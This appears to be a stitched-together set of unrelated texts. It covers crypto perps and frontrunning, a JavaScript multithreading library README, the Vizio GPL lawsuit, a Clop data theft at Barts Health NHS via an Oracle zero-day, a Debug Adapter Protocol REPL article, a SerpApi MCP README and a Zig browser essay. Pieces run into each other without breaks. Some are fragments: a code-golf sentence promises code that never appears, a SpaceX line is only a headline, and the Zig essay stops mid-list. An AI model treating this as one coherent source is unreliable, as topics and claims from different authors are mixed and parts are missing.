. This contrasts with crypto, where the market expectation for many years was that the customer was Daffy Duck with a gmail address and a pseudonymous set of numbered accounts recorded on a blockchain, and dunning them was a waste of time. Crypto exchanges have mostly, in the intervening years, either stepped up their game regarding
KYC
or pretended to do so, but the market expectation is still that a defaulting user will basically never successfully recover. (Note that the legal obligation to pay is not coextensive with users actually paying. The retail speculators with $25,000 of capital that the pattern day trade rules are worried about will often not have $5,000 to cover a deficiency. On the other end of the scale, when a hedge fund blows up, the fund entity is wiped out, but its limited partners—pension funds, endowments, family offices—are not on the hook to the prime broker, and nobody expects the general partner to start selling their house to make up the difference.)
So who bears the loss when the customer doesn’t, can’t, or won’t? The waterfall depends on market, product type, and geography, but as a sketch: brokerages bear the loss first, out of their own capital. They’re generally required to keep a reserve for this purpose.
A brokerage will, in the ordinary course of business, have obligations to other parties which would be endangered if they were catastrophically mismanaged and could not successfully manage risk during a downturn. (It’s been known to happen, and even can be associated with
assets rather than liabilities
.) In this case, most of those counterparties are partially insulated by structures designed to insure the peer group. These include e.g. clearing pools, guaranty funds capitalized by the member firms of a clearinghouse, the clearinghouse’s own capital, and perhaps mutualized insurance pools. That is the rough ordering of the waterfall, which varies depending on geography/product/market.
One can imagine a true catastrophe which burns through each of those layers of protection, and in that case, the clearinghouse might be forced to assess members or allocate losses across survivors. That would be a very, very bad day, but contracts exist to be followed on very bad days.
One commonality with crypto, though: this system is also not fully capitalized against all possible events at all times. Unlike crypto, which for contingent reasons pays some lip service to being averse to credit even as it embraces leveraged trading, the traditional industry relies
extensively
on underwriting risk of various participants.
Will crypto successfully “export” perps?
Many crypto advocates believe that they have something which the traditional finance industry desperately needs. Perps are crypto’s most popular and lucrative product, but they probably won’t be adopted materially in traditional markets.
Existing derivatives products already work reasonably well at solving the cost of capital issue. Liquidations are not the business model of traditional brokerages. And learning, on a day when markets are 20% down, that you might be hedged or you might be bankrupt, is not a prospect which fills traditional finance professionals with the warm fuzzies.
And now you understand the crypto markets a bit better.
[0] Brokers trading with their own customers can happen in the ordinary course of business, but has been progressively discouraged in traditional finance, as it enables frontrunning.
Frontrunning, while it is understood in the popular parlance to mean “trading before someone else can trade” and often brought up in discussions of high frequency trading using very fast computers, does not historically mean that. It historically describes a single abusive practice: a broker could basically use
the slowness
of traditional financial IT systems to give conditional post-facto treatment to customer orders, taking the other side of them (if profitable) or not (if not). Frontrunning basically disappeared because customers now get order confirms almost instantly by computer, not at end of day via a phone call. The confirm has the price the trade executed at on it.
In classic frontrunning, you sent the customer’s order to the market (at some price X), waited a bit, and then observed a later price Y. If Y was worse for the customer than X, well, them’s the breaks on Wall Street. If Y was better, you congratulated the customer on their investing acumen, and informed them that they had successfully transacted at Z, a price of your choosing between X and Y. You then fraudulently inserted a recorded transaction between the customer and yourself earlier in the day, at price Z, and assigned the transaction which happened at X to your own account, not to the customer’s account.
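A worked example with invented prices:
// Classic frontrunning, per the mechanics above. All prices invented.
const X = 100; // price the customer's order actually executed at
const Y = 110; // price observed later in the day
const Z = 104; // price the broker decides to "confirm" to the customer

// The broker keeps the real fill at X for its own account and books a fake
// same-day trade selling to the customer at Z.
const brokerSkim = Z - X;   // 4 per share, with zero market risk
const customerGain = Y - Z; // 6 per share instead of the 10 their order actually earned
console.log(brokerSkim, customerGain);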
Frontrunning was a lucrative scam while it lasted, because (effectively) the customer takes 100% of the risk of the trade but the broker gets any percentage they want of the first day’s profits. This is potentially
so
lucrative that smart money (and some investors in his funds!) thought Madoff was doing it, thus generating the better-than-market stable returns for over a decade through malfeasance. Of frontrunning Madoff was entirely innocent.
Some more principled crypto participants have attempted to discourage exchanges from trading with their own customers. They have mostly been unsuccessful: Merit Peak Limited is Binance’s captive entity which does this, and is occasionally described by U.S. federal agencies as running a sideline in money laundering. Alameda Research was FTX’s affiliated trading fund, whose management was criminally convicted of money laundering. Etc, etc.
One of the reasons this behavior is so adaptive is because the billions of dollars sloshing around can be described to banks as “proprietary trading” and “running an OTC desk”, and an inattentive bank (like, say, Silvergate, as
recounted here
) might miss the customer fund flows they would have been formally unwilling to facilitate. This is a useful feature for sophisticated crypto participants, and so some of them do not draw attention to the elephant in the room, even though it is averse to their interests.
[1] Not
all
crypto trades are pre-funded. Crypto OTC transactions sometimes settle on T+1, with the OTC desk essentially extending credit in the fashion that a prime broker would in traditional markets. But most transactions on exchanges have to be paid immediately in cash already at the venue. This is very different from traditional equity market structure, where venues don’t typically receive funds flow at all, and settling/clearing happens after the fact, generally by a day or two.
[2] I note, for the benefit of readers of footnote 0, that there is often a substantial gap between the time when market dislocation happens and when a trader is informed they were ADLed. The implications of this are left as an exercise to the reader.
Want more essays in your inbox?
I write about the intersection of tech and finance, approximately biweekly. It's free.
The missing standard library for multithreading in JavaScript
Multithreading
is a TypeScript library that brings robust, Rust-inspired concurrency primitives to the JavaScript ecosystem. It provides a thread-pool architecture, strict memory safety semantics, and synchronization primitives like Mutexes, Read-Write Locks, and Condition Variables.
This library is designed to abstract away the complexities of managing WebWorkers, serialization, and SharedArrayBuffer, allowing developers to write multi-threaded code that looks and feels like standard asynchronous JavaScript.
Installation
npm install multithreading
Core Concepts
JavaScript is traditionally single-threaded. To achieve true parallelism, this library uses Web Workers. However, unlike standard Workers, this library offers:
Managed Worker Pool
: Automatically manages a pool of threads based on hardware concurrency.
Shared Memory Primitives
: Tools to safely share state between threads without race conditions.
Scoped Imports
: Support for importing external modules and relative files directly within worker tasks.
Move Semantics
: Explicit data ownership transfer to prevent cloning overhead.
Quick Start
The entry point for most operations is the
spawn
function. This submits a task to the thread pool and returns a handle to await the result.
import { spawn } from "multithreading";

// Spawn a task on a background thread
const handle = spawn(() => {
  // This code runs in a separate worker
  const result = Math.random();
  return result;
});

// Wait for the result
const result = await handle.join();
if (result.ok) {
  console.log("Result:", result.value); // 0.6378467071314606
} else {
  console.error("Worker error:", result.error);
}
Passing Data: The
move()
Function
Because Web Workers run in a completely isolated context, functions passed to
spawn
cannot capture variables from their outer scope. If you attempt to use a variable inside the worker that was defined outside of it, the code will fail.
To get data from your main thread into the worker, you have to use the
move()
function.
The
move
function accepts variadic arguments. These arguments are passed to the worker function in the order they were provided. Despite the name,
move
handles data in two ways:
Transferable Objects (e.g.,
ArrayBuffer
,
Uint32Array
):
These are "moved" (zero-copy). Ownership transfers to the worker, and the original becomes unusable in the main thread.
Non-Transferable Objects (e.g., JSON, numbers, strings):
These are cloned via structured cloning. They remain usable in the main thread.
import { spawn, move } from "multithreading";

// Will be transferred
const largeData = new Uint8Array(1024 * 1024 * 10); // 10MB

// Will be cloned
const metaData = { id: 1 };

// We pass arguments as a comma-separated list.
const handle = spawn(move(largeData, metaData), (data, meta) => {
  console.log("Processing ID:", meta.id);
  return data.byteLength;
});

await handle.join();
SharedJsonBuffer: Sharing Complex Objects
SharedJsonBuffer
enables Mutex-protected shared memory for JSON objects, eliminating the overhead of
postMessage
data copying. Unlike standard buffers, it handles serialization automatically. It supports partial updates, re-serializing only changed bytes rather than the entire object tree for high-performance state synchronization.
import { move, Mutex, SharedJsonBuffer, spawn } from "multithreading";

const sharedState = new Mutex(
  new SharedJsonBuffer({
    score: 0,
    players: ["Main Thread"],
    level: {
      id: 1,
      title: "Start",
    },
  })
);

await spawn(move(sharedState), async (lock) => {
  using guard = await lock.acquire();
  const state = guard.value;

  console.log(`Current Score: ${state.score}`);

  // Modify the data
  state.score += 100;
  state.players.push("Worker1");
  // End of scope: Lock is automatically released here
}).join();

// Verify on main thread
using guard = await sharedState.acquire();
console.log(guard.value); // { score: 100, players: ["Main Thread", "Worker1"], ... }
Synchronization Primitives
When multiple threads access shared memory (via
SharedArrayBuffer
), race conditions occur. This library provides primitives to synchronize access safely.
Best Practice:
It is highly recommended to use the asynchronous methods (e.g.,
acquire
,
read
,
write
,
wait
) rather than their synchronous counterparts. Synchronous blocking halts the entire Worker thread, potentially pausing other tasks sharing that worker.
1. Mutex (Mutual Exclusion)
A
Mutex
ensures that only one thread can access a specific piece of data at a time.
Option A: Automatic Management (Recommended)
This library leverages the
Explicit Resource Management
proposal (
using
keyword). When you acquire a lock, it returns a guard. When that guard goes out of scope, the lock is automatically released.
import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // 'using' automatically calls dispose() at the end of the scope
  using guard = await mutex.acquire();
  guard.value[0]++;
  // End of scope: Lock is automatically released here
});
Option B: Manual Management (Bun / Standard JS)
If you are using
Bun
(which doesn't natively support
using
and uses a transpiler which is incompatible with this library) or prefer standard JavaScript syntax, you must manually release the lock using
drop()
. Always use a
try...finally
block to ensure the lock is released even if an error occurs.
import { spawn, move, Mutex } from "multithreading";

const buffer = new SharedArrayBuffer(4);
const counterMutex = new Mutex(new Int32Array(buffer));

spawn(move(counterMutex), async (mutex) => {
  // Note that we have to import drop here, otherwise it wouldn't be available
  const { drop } = await import("multithreading");

  // 1. Acquire the lock manually
  const guard = await mutex.acquire();
  try {
    // 2. Critical Section
    guard.value[0]++;
  } finally {
    // 3. Explicitly release the lock
    drop(guard);
  }
});
2. RwLock (Read-Write Lock)
A
RwLock
is optimized for scenarios where data is read often but written rarely. It allows
multiple
simultaneous readers but only
one
writer.
import { spawn, move, RwLock } from "multithreading";

const lock = new RwLock(new Int32Array(new SharedArrayBuffer(4)));

// Spawning a Writer
spawn(move(lock), async (l) => {
  // Blocks until all readers are finished (asynchronously)
  using guard = await l.write();
  guard.value[0] = 42;
});

// Spawning Readers
spawn(move(lock), async (l) => {
  // Multiple threads can hold this lock simultaneously
  using guard = await l.read();
  console.log(guard.value[0]);
});
3. Semaphore
A
Semaphore
limits the number of threads that can access a resource simultaneously. Unlike a Mutex (which allows exactly 1 owner), a Semaphore allows
N
owners. This is essential for rate limiting, managing connection pools, or bounding concurrency.
import { spawn, move, Semaphore } from "multithreading";

// Initialize with 3 permits (allowing 3 concurrent tasks)
const semaphore = new Semaphore(3);

for (let i = 0; i < 10; i++) {
  spawn(move(semaphore), async (sem) => {
    console.log("Waiting for slot...");

    // Will wait (async) if 3 threads are already working
    using _ = await sem.acquire();

    console.log("Acquired slot! Working...");
    await new Promise((r) => setTimeout(r, 1000));
    // Guard is disposed automatically, releasing the permit for the next thread
  });
}
Manual Release
Like the Mutex, if you cannot use the
using
keyword, you can manually manage the lifecycle.
spawn(move(semaphore), async (sem) => {
  const { drop } = await import("multithreading");

  // Acquire 2 permits at once
  const guard = await sem.acquire(2);
  try {
    // Critical Section
  } finally {
    // Release the 2 permits
    drop(guard);
  }
});
4. Condvar (Condition Variable)
A
Condvar
allows threads to wait for a specific condition to become true. It saves CPU resources by putting the task to sleep until it is notified, rather than constantly checking a value.
import { spawn, move, Mutex, Condvar } from "multithreading";

const mutex = new Mutex(new Int32Array(new SharedArrayBuffer(4)));
const cv = new Condvar();

spawn(move(mutex, cv), async (lock, cond) => {
  using guard = await lock.acquire();

  // Wait until value is not 0
  while (guard.value[0] === 0) {
    // wait() unlocks the mutex, waits for notification, then re-locks.
    await cond.wait(guard);
  }

  console.log("Received signal, value is:", guard.value[0]);
});
Channels (MPMC)
For higher-level communication, this library provides a
Multi-Producer, Multi-Consumer (MPMC)
bounded channel. This primitive mimics Rust's
std::sync::mpsc
but allows for multiple consumers. It acts as a thread-safe queue that handles backpressure, blocking receivers when empty and blocking senders when full.
Channels are the preferred way to coordinate complex workflows (like job queues or pipelines) between workers without manually managing locks.
Key Features
Arbitrary JSON Data:
Channels are backed by
SharedJsonBuffer
, allowing you to send any JSON-serializable value (objects, arrays, strings, numbers, booleans) through the channel, not just raw integers.
Bounded:
You define a capacity. If the channel is full,
send()
waits. If empty,
recv()
waits.
Clonable:
Both
Sender
and
Receiver
can be cloned and moved to different workers.
Reference Counted:
The channel automatically closes when all Senders are dropped (indicating no more data will arrive) or all Receivers are dropped.
Example: Worker Pipeline with Objects
import { spawn, move, channel } from "multithreading";

// Create a channel that holds objects
const [tx, rx] = channel<{ hello: string }>();

// Producer Thread
spawn(move(tx), async (sender) => {
  await sender.send({ hello: "world" });
  await sender.send({ hello: "multithreading" });
  // Sender is destroyed here, automatically closing the channel
});

// Consumer Thread
spawn(move(rx.clone()), async (rx) => {
  for await (const value of rx) {
    console.log(value); // { hello: "world" }
  }
});

// Because we cloned rx, we can also receive on the main thread
for await (const value of rx) {
  console.log(value); // { hello: "world" }
}
Importing Modules in Workers
One of the most difficult aspects of Web Workers is handling imports. This library handles this automatically, enabling you to use dynamic
await import()
calls inside your spawned functions.
You can import:
External Libraries:
Packages from npm/CDN (depending on environment).
Relative Files:
Files relative to the file calling
spawn
.
Note:
The function passed to
spawn
must be self-contained or explicitly import what it needs. It cannot access variables from the outer scope unless they are passed via
move()
.
Example: Importing Relative Files and External Libraries
// main.ts
import { spawn } from "multithreading";

spawn(async () => {
  // 1. Importing a relative file
  // This path is relative to 'main.ts' (the caller location)
  const utils = await import("./utils.ts");

  // 2. Importing an external library (e.g., from a URL or node_modules resolution)
  const _ = await import("lodash");

  console.log("Magic number from relative file:", utils.magicNumber);
  console.log("Random number via lodash:", _.default.random(1, 100));

  return utils.magicNumber;
});
API Reference
Runtime
spawn(fn)
: Runs a function in a worker.
spawn(move(arg1, arg2, ...), fn)
: Runs a function in a worker with specific arguments transferred or copied.
initRuntime(config)
: Initializes the thread pool (optional, lazy loaded by default).
shutdown()
: Terminates all workers in the pool.
Memory Management
move(...args)
: Marks arguments for transfer (ownership move) rather than structured clone. Accepts a variable number of arguments which map to the arguments of the worker function.
drop(resource)
: Explicitly disposes of a resource (calls
[Symbol.dispose]
). This is required for manual lock management in environments like Bun.
SharedJsonBuffer
: A class for storing JSON objects in shared memory.
Channels (MPMC)
channel<T>(capacity)
: Creates a new channel. Returns
[Sender<T>, Receiver<T>]
.
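As a quick illustration of the bounded behavior described above (a sketch assuming the documented send/recv semantics; exact return shapes may differ):
import { channel } from "multithreading";

// A bounded channel with capacity 2: the third send() waits until a recv() frees a slot.
const [tx, rx] = channel<number>(2);

await tx.send(1);
await tx.send(2);

const pending = tx.send(3);   // does not resolve until a receiver drains one item
console.log(await rx.recv()); // 1 (or a result wrapper, depending on the API)
await pending;                // the third send has now completed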
For advanced users interested in the internal mechanics:
Serialization Protocol
: The library uses a custom "Envelope" protocol (
PayloadType.RAW
vs
PayloadType.LIB
). This allows complex objects like
Mutex
handles to be serialized, sent to a worker, and rehydrated into a functional object connected to the same
SharedArrayBuffer
on the other side.
Atomics
: Synchronization is built on
Int32Array
backed by
SharedArrayBuffer
using
Atomics.wait
and
Atomics.notify
.
Import Patching
: The
spawn
function analyzes the stack trace to determine the caller's file path. It then regex-patches
import()
statements within the worker code string to ensure relative paths resolve correctly against the caller's location, rather than the worker's location.
Judge Signals Win for Software Freedom Conservancy in Vizio GPL Case
A California judge has tentatively sided with Software Freedom Conservancy in its GPL case over Vizio’s SmartCast TVs, but the final outcome of this week’s hearing is still pending.
Source: Pixabay
We’re waiting to hear the final outcome of a legal case involving the GPL that harkens back to the bad “good ol’ days” of Linux and open source.
This case involves an action brought against Vizio — a maker of relatively low‑cost flat panel TVs — by Software Freedom Conservancy, which claims that the company has been in violation of the General Public License, version 2 and Lesser General Public License, version 2.1 for many years. The case centers around the company’s SmartCast TVs, which employ Linux, BusyBox, and other software licensed under GPLv2 and LGPLv2.1, without making source code available.
SFC’s standing in the case is as a purchaser of a Vizio smart TV and not as a copyright holder.
SFC has reported that early Thursday morning Judge Sandy N. Leal of the Superior Court of California issued a tentative ruling supporting SFC’s claim that Vizio has a duty to provide SFC with the complete source code covered under open source licenses to a TV it purchased. Being tentative, the ruling isn’t final – such rulings are issued so that the parties know how the judge is leaning and can tailor their oral arguments – and it was issued before a hearing scheduled for 10 a.m. PST the same day.
So far there’s been no news coming out of that hearing, although we’ve reached out to SFC for a comment.
A Predictable Outcome
These days the GPL and other open source licenses have been court tested enough to make the outcome in a case like this somewhat predictable: the courts will support the terms of the license. This hasn’t always been the case. For many years after the first adoption of the GPL as a free software license, and even later when the term open source came into use, it wasn’t clear whether courts would support the terms of open source licensing.
That began to change in the first decade of the 21st century as cases were brought against violators of open source licenses, with license terms being upheld by the courts.
Then in September 2007 the Software Freedom Law Center filed the first-ever US GPL enforcement lawsuit. The defendant was Monsoon Multimedia, for its Hava
place‑shifting devices
that SFLC claimed shipped with BusyBox installed without provisions for the source code. That case was dismissed about a month later, after Monsoon agreed to publish source code, appoint a compliance officer, notify customers of their GPL rights, and pay an undisclosed sum.
Later that year, SFLC brought additional BusyBox-related GPL suits against other vendors, including Xterasys and Verizon, over failure to provide source code. Those were also settled with compliance commitments and payments.
Vizio: A Goliath in Disguise
In the case against Vizio, SFC is going against a company that can afford a deep-pocketed defense if it decides to play hardball. The Irvine, California-based company, founded in 2002 as a designer of televisions, soundbars, and related software and accessories, was acquired by Walmart for $2.3 billion in a deal that was announced in February 2024 and closed that December.
While the acquisition was in progress, Bloomberg announced that Walmart planned to end sales of Vizio products at Amazon and Best Buy in order to turn the company into a private label brand available only at Walmart and Sam’s Club locations.
Christine Hall has been a journalist since 1971. In 2001, she began writing a weekly consumer computer column and started covering Linux and FOSS in 2002 after making the switch to GNU/Linux. Follow her on Twitter:
@BrideOfLinux
I am neither a web developer nor a code-golfer. Seasoned
code-golfers looking for a challenge can probably shrink this
solution further. However, such wizards are also likely to scoff at
any mention of counting lines of code, since CSS can be collapsed
into a single line. The number of characters is probably more
meaningful. The code can also be minified slightly by removing all
whitespace:
Barts Health NHS discloses data breach after Oracle zero-day hack
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 18:55:26
Barts Health NHS Trust, a major healthcare provider in England, announced that Clop ransomware actors have stolen files from one of its databases after exploiting a vulnerability in its Oracle E-business Suite software.
The stolen data are invoices spanning several years that expose the full names and addresses of individuals who paid for treatment or other services at Barts Health hospital.
Information of former employees who owed money to the trust, and suppliers whose data is already public, has also been exposed, the organization says.
In addition to Barts' files, the compromised database includes files concerning accounting services the trust provided since April 2024 to Barking, Havering, and Redbridge University Hospitals NHS Trust.
The Clop ransomware gang has leaked the stolen information on its leak portal on the dark web.
"The theft occurred in August, but there was no indication that trust data was at risk until November when the files were posted on the dark web,"
explained Barts
.
"To date no information has been published on the general internet, and the risk is limited to those able to access compressed files on the encrypted dark web."
The hospitals operator stated that it is in the process of getting a High Court order to ban the publication, use, or sharing of the exposed data by anyone, though such orders have limited effect in practice.
Barts Health NHS Trust runs five hospitals throughout the city of London, namely Mile End Hospital, Newham University Hospital, Royal London Hospital, St Bartholomew's Hospital, and Whipps Cross University Hospital.
The Clop ransomware gang has been exploiting a critical Oracle EBS flaw tracked as CVE-2025-61882 as a zero-day in data theft attacks
since early August
, stealing private information from a large number of organizations worldwide.
Barts has already informed the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner's Office (ICO) about the data theft incident.
The healthcare organization said that Clop's attack did not impact its electronic patient record and clinical systems, and that it is confident its core IT infrastructure remains secure.
Patients who have paid Barts are advised to check their invoices to determine what data was exposed and to stay vigilant for unsolicited communications, especially messages that request payment or the sharing of sensitive information.
The Debug Adapter Protocol is a REPL protocol in disguise
A couple months back I created
nluarepl
. It’s a
REPL for the Neovim Lua interpreter with a little twist: It’s using the
Debug Adapter Protocol. And before that, I worked on
hprofdap
. Also a
kind of a REPL using DAP that lets you inspect Java heap dumps
(
.hprof
files) using OQL.
As the name might imply, a REPL isn’t the main use case for the Debug
Adapter Protocol (DAP). From the
DAP
page
:
The idea behind the Debug Adapter Protocol (DAP) is to abstract the
way how the debugging support of development tools communicates with
debuggers or runtimes into a protocol.
But it works surprisingly well for a REPL interface to a language
interpreter too.
The typical REPL shows you a prompt after which you can enter an
expression. You then hit
Enter
to submit the expression, it
gets evaluated and you’re presented with the result or an error.
The Debug Adapter Protocol defines an
evaluate
command
which - as the name implies - evaluates expressions.
The definition for the payload the client needs to send looks like
this:
interface EvaluateArguments {
  /**
   * The expression to evaluate.
   */
  expression: string;

  // [...]
}
With a few more optional properties.
The important parts of the response format definition look like
this:
interface EvaluateResponse extends Response {
  body: {
    /**
     * The result of the evaluate request.
     */
    result: string;

    /**
     * The type of the evaluate result.
     * This attribute should only be returned by a debug adapter if the
     * corresponding capability `supportsVariableType` is true.
     */
    type?: string;

    /**
     * If `variablesReference` is > 0, the evaluate result is structured and its
     * children can be retrieved by passing `variablesReference` to the
     * `variables` request as long as execution remains suspended. See 'Lifetime
     * of Object References' in the Overview section for details.
     */
    variablesReference: number;

    // [...]
  };
}
result
is a string and there is optionally a type. The
neat bit is the
variablesReference
. It’s used to model
structured data - allowing a client to build a tree-like UI to drill down into
the details of a data structure.
Here is a demo to see it in action:
To get the data - or expand an option as shown in the demo above, the
client must call the
variables
command
with the
variablesReference
as payload. The
response has an array of variables, where a variable looks like
this:
interface Variable {
  /**
   * The variable's name.
   */
  name: string;

  /**
   * The variable's value.
   * This can be a multi-line text, e.g. for a function the body of a function.
   * For structured variables (which do not have a simple value), it is
   * recommended to provide a one-line representation of the structured object.
   * This helps to identify the structured object in the collapsed state when
   * its children are not yet visible.
   * An empty string can be used if no value should be shown in the UI.
   */
  value: string;

  /**
   * The type of the variable's value. Typically shown in the UI when hovering
   * over the value.
   * This attribute should only be returned by a debug adapter if the
   * corresponding capability `supportsVariableType` is true.
   */
  type?: string;

  /**
   * If `variablesReference` is > 0, the variable is structured and its children
   * can be retrieved by passing `variablesReference` to the `variables` request
   * as long as execution remains suspended. See 'Lifetime of Object References'
   * in the Overview section for details.
   */
  variablesReference: number;

  // [...]
}
A
Variable
is pretty similar to the initial
evaluate
result, except that it has both name and value. It
also again has a
variablesReference
property, which means
that they can be arbitrarily deeply nested (and you can have cyclic
references).
This already covers most of the functionality of a typical REPL
backend. One more feature that’s nice to have is completion, and the
Debug Adapter Protocol also has a
completions
command
for that. Click on the link if you’re interested - I won’t
go into detail about that here.
Another untypical feature for a REPL that the Debug Adapter Protocol
provides is finding the locations of a variable definition. That’s also
implemented in
nluarepl
, although
it only works for functions.
You might be wondering if there is anything in the Debug Adapter
Protocol one must implement that’s useless baggage if all you want is a
REPL frontend or backend.
Yes, there are a few things:
There’s the RPC mechanism, which is close to JSON-RPC, but not
quite.
Breakpoint handling. You can send back a response that rejects all.
(
nluarepl
implements log points - which is basically dynamic log statements you
can create at runtime)
Session initialization. Here you can send back the
capabilities.
launch
/
attach
pseudo handling.
Disconnect/terminate handling. Not much needed here - you can use
these to clean up any state.
The typical flow is that a client starts a debug session with an
initialize
command. Then the debug adapter replies with its
capabilities and a normal client follows up by sending breakpoints. After that it typically sends a
launch
command, which
in a normal scenario would launch the application you want to debug.
To give you an impression of what this entails, here’s roughly what the “dummy” handlers in nluarepl boil down to:
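A minimal sketch, written in TypeScript rather than nluarepl’s actual Neovim Lua, with hypothetical request/sendResponse shapes standing in for the real wire handling:
// Rough shape of the "dummy" handlers a REPL-only debug adapter needs.
// `request` and `sendResponse` are stand-ins, not real nluarepl or DAP SDK APIs.
function handleRequest(
  request: { seq: number; command: string; arguments?: unknown },
  sendResponse: (body?: unknown) => void,
): void {
  switch (request.command) {
    case "initialize":
      // Advertise only what the REPL actually supports.
      sendResponse({ supportsCompletionsRequest: true, supportsVariableType: true });
      break;
    case "setBreakpoints":
      // Reject every breakpoint: there is nothing to break into.
      sendResponse({ breakpoints: [] });
      break;
    case "launch":
    case "attach":
      // Nothing to launch; the interpreter is already running.
      sendResponse();
      break;
    case "disconnect":
    case "terminate":
      // Clean up any evaluation state here.
      sendResponse();
      break;
  }
}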
Why build a REPL on the Debug Adapter Protocol at all? Partly because of laziness. From a development perspective I didn’t
want to have to implement another REPL UI. Going the DAP route let me
focus on the evaluation parts. And from a user perspective - I also
wanted to re-use UI elements from
nvim-dap
. I’m used
to that interface and have keymaps setup. I didn’t want to have another
slightly different interface with different keymaps or behavior.
SpaceX in Talks for Share Sale That Would Boost Valuation to $800B
A Model Context Protocol (MCP) server implementation that integrates with
SerpApi
for comprehensive search engine results and data extraction.
Features
Multi-Engine Search
: Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and
more
Real-time Weather Data
: Location-based weather with forecasts via search queries
Stock Market Data
: Company financials and market data through search integration
Dynamic Result Processing
: Automatically detects and formats different result types
Flexible Response Modes
: Complete or compact JSON responses
JSON Responses
: Structured JSON output with complete or compact modes
Quick Start
SerpApi MCP Server is available as a hosted service at
mcp.serpapi.com
. In order to connect to it, you need to provide an API key. You can find your API key on your
SerpApi dashboard
.
You can configure Claude Desktop to use the hosted server by adding it to your MCP configuration together with your API key.
The MCP server has one main Search Tool that supports all SerpApi engines and result types. You can find all available parameters on the
SerpApi API reference
.
The parameters you can provide are specific for each API engine. Some sample parameters are provided below:
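For illustration, parameters for a couple of engines might look like this (names follow SerpApi's documented query parameters; the values are placeholders):
// Illustrative parameters for a Google search via the Search Tool.
const googleSearchParams = {
  engine: "google",
  q: "coffee shops",
  location: "Austin, Texas, United States",
  hl: "en", // interface language
  gl: "us", // country for the search
  num: 10,  // number of results
};

// Illustrative parameters for a YouTube search.
const youtubeSearchParams = {
  engine: "youtube",
  search_query: "model context protocol",
};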
To be honest, when I began working on Lightpanda, I chose Zig because I’m not smart enough to build a big project in C++ or Rust.
I like simple languages. I like Zig for the same reasons I like Go, C, and the KISS principle. Not just because I believe in this philosophy, but because I’m not capable of handling complicated abstractions at scale.
Before Lightpanda, I was doing a lot of Go. But building a web browser from scratch requires a low-level systems programming language to ensure great performance, so Go wasn’t an option. And for a project like this, I wanted more safety and modern tooling than C.
Why We Built Lightpanda in Zig
Our requirements were performance, simplicity, and modern tooling. Zig seemed like the perfect balance: simpler than C++ and Rust, top-tier performance, and better tooling and safety than C.
As we built the first iterations of the browser and dug deeper into the language, we came to appreciate features where Zig particularly shines: comptime metaprogramming, explicit memory allocators, and best-in-class C interoperability. Not to mention the ongoing work on compilation times.
Of course it’s a big bet. Zig is a relatively new language with a small ecosystem. It’s pre-1.0 with regular breaking changes. But we’re very bullish on this language, and we’re not the only ones:
Ghostty
,
Bun
,
TigerBeetle
, and
ZML
are all building with Zig. And with
Anthropic’s recent acquisition of Bun
, big tech is taking notice.
Here’s what we’ve learned.
What Lightpanda Needs from a Language
Before diving into specifics, let’s talk about what building a browser for web automation requires.
First, we needed a JavaScript engine. Without one, a browser only sees static HTML: no client-side rendering and no dynamic content. We chose V8, Chrome’s JavaScript engine, because it’s state of the art, widely used (
Node.js
,
Deno
), and relatively easy to embed.
V8 is written in C++, and doesn’t have a C API, which means any language integrating with it must handle C++ boundaries. Zig doesn’t interoperate directly with C++, but it has first-class C interop, and C remains the lingua franca of systems programming. We use C headers generated primarily from
rusty_v8
, part of the
Deno project
, to bridge between V8’s C++ API and our Zig code.
Beyond integration, performance and memory control were essential. When you’re crawling thousands of pages or running automation at scale, every millisecond counts. We also needed precise control over short-lived allocations like DOM trees, JavaScript objects, and parsing buffers. Zig’s explicit allocator model fits that need perfectly.
Why Not C++?
C++ was the obvious option: it powers virtually every major browser engine. But here’s what gave us pause.
Four decades of features
: C++ has accumulated enormous complexity over the years. There are multiple ways to do almost everything: template metaprogramming, multiple inheritance patterns, various initialization syntaxes. We wanted a language with one clear way to do things.
Memory management
: Control comes with constant vigilance. Use-after-free bugs, memory leaks, and dangling pointers are real risks. Smart pointers help, but they add complexity and runtime overhead. Zig’s approach of passing allocators explicitly makes memory management clearer and enables patterns like arenas more naturally.
Build systems
: Anyone who’s fought with CMake or dealt with header file dependencies knows this pain. For a small team trying to move quickly, we didn’t want to waste time debugging build configuration issues.
We’re not saying C++ is bad. It powers incredible software. But for a small team starting from scratch, we wanted something simpler.
Why not Rust?
Many people ask this next. It’s a fair challenge. Rust is a more mature language than Zig, offers memory safety guarantees, has excellent tooling, and a growing ecosystem.
Rust would have been a viable choice. But for Lightpanda’s specific needs (and honestly, for our team’s experience level) it introduced friction we didn’t want.
The Unsafe Rust Problem
When you need to do things the borrow checker doesn’t like, you end up writing unsafe Rust, which is surprisingly hard.
Zack
from
Bun
explores this in depth in his article
When Zig is safer and faster than Rust
.
Browser engines and garbage-collected runtimes are classic examples of code that fights the borrow checker. You’re constantly juggling different memory regions: per-page arenas, shared caches, temporary buffers, objects with complex interdependencies. These patterns don’t map cleanly to Rust’s ownership model. You end up either paying performance costs (using indices instead of pointers, unnecessary clones) or diving into unsafe code where raw pointer ergonomics are poor and Miri becomes your constant companion.
Zig takes a different approach. Rather than trying to enforce safety through the type system and then providing an escape hatch, Zig is designed for scenarios where you’re doing memory-unsafe things. It gives you tools to make that experience better: non-null pointers by default, the GeneralPurposeAllocator that catches use-after-free bugs in debug mode, and pointer types with good ergonomics.
Why Zig Works for Lightpanda
Zig sits in an interesting space. It’s a simple language that’s easy to learn, where everything is explicit: no hidden control flow, no hidden allocations.
Explicit Memory Management with Allocators
Zig makes you choose how memory is managed through allocators. Every allocation requires you to specify which allocator to use. This might sound tedious at first, but it gives you precise control.
In practice, this means handing each unit of work its own arena allocator.
This pattern matches browser workloads perfectly. Each page load gets its own arena. When the page is done, we throw away the entire memory chunk. No tracking individual allocations, no reference counting overhead, no garbage collection pauses. (Though we’re learning that single pages can grow large in memory, so we’re also exploring mid-lifecycle cleanup strategies.) And you can chain arenas to create short-lived objects inside a page lifecycle.
Compile-Time Metaprogramming
Zig’s comptime feature lets you write code that runs during compilation. We use this extensively to reduce boilerplate when bridging Zig and JavaScript.
When integrating V8, you need to expose native types to JavaScript. In most languages, this requires glue code for each type. To generate this glue you need some code generation, usually through macros (Rust, C, C++). Macros are a completely different language, which has a lot of downsides. Zig’s comptime lets us automate this.
The registerType function uses comptime reflection to:
Find all public methods on Point
Generate JavaScript wrapper functions
Create property getters/setters for x and y
Handle type conversions automatically
